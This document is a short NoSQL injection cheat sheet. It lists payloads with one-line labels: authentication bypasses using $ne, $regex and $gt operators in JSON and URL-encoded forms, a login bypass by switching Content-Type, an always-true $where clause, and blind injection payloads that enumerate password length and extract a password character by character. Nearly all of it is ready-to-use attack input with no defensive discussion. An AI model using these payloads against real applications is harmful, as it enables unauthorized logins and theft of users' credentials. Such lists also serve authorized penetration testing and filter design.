NoSQL Injection

Authentication Bypass
Bypass by checking both fields exist
{"username": {"$ne": null}, "password": {"$ne": null}}
Bypass using regex wildcard to match any value
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
Bypass for known username, password greater than empty string
{"username": "admin", "password": {"$gt": ""}}

URL-encoded bypasses

URL-encoded version of null check bypass
username[$ne]=null&password[$ne]=null
URL-encoded regex wildcard bypass
username[$regex]=.*&password[$regex]=.*
NoSQL Login Bypass by Content-Type Switch

With Content-Type: application/x-www-form-urlencoded try:

URL-Encoded
user=admin&password[$ne]=wrongpassword

Otherwise, set the Content-Type to application/json on the POST request:

JSON
{"user": "admin", "password": {"$ne": "wrongpassword"}}
JSON injection in web forms
Both fields not equal to empty string
{"username": {"$ne": ""}, "password": {"$ne": ""}}
$where clause always evaluates to true
{"$where": "this.username == this.username"}
Blind NoSQL injection

Length enumeration

{"username": "admin", "password": {"$regex": ".{1}"}}
{"username": "admin", "password": {"$regex": ".{2}"}}

Character-by-character extraction

{"username": "admin", "password": {"$regex": "^a.*"}}
{"username": "admin", "password": {"$regex": "^ad.*"}}
